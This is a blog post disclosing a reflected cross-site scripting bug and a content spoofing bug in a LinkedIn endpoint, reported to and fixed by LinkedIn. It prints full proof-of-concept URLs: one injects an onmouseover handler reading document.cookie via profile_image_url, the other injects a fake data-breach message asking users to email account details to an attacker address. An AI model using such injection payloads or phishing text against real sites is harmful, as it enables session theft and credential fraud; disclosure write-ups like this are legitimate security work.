LinkedIn Cross-Site-Scripting (XSS) & Content Spoofing Vulnerability

Couple of days back, I reported XSS and Content Spoofing on LinkedIn. Here are the details of the issues.

Cross Site Scripting:

What is Cross Site Scripting?

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user’s credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

LinkedIn XSS

URL: http://www.linkedin.com/contacts/services/linkedin_connect_div_without_contact_id/?invitee_linkedin_id=30680542&profile_image_url=http://www.niiconsulting.com/img/NIILogo.png%20width=400%20height=400%20onmouseover=alert(document.cookie);&name=Sunil&first_name=Yadav&headline=&_=1382600845381

Vulnerable Parameter: profile_image_url

XSS

Content Spoofing

What is Content Spoofing?

Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user made possible by injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user. This presents the user with a modified page under the context of the trusted domain.

content spoofing on linkedin

URL: http://www.linkedin.com/contacts/services/linkedin_connect_div_without_contact_id/?invitee_linkedin_id=30680542&profile_image_url=http://www.niiconsulting.com/img/NIILogo.png%20width=400 height=400&name=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&first_name=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&headline=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&_=1382600845381

Vulnerable Parameters: profile_image_url,name,first_name,headline

Content Spoofing Bug in LinkedIn
Content Spoofing – LinkedIn

Both the issues were fixed in a matter of time.  Thank You, Linked Security Team 🙂

Author


1 comment

Great!

Leave a Reply

Your email address will not be published. Required fields are marked *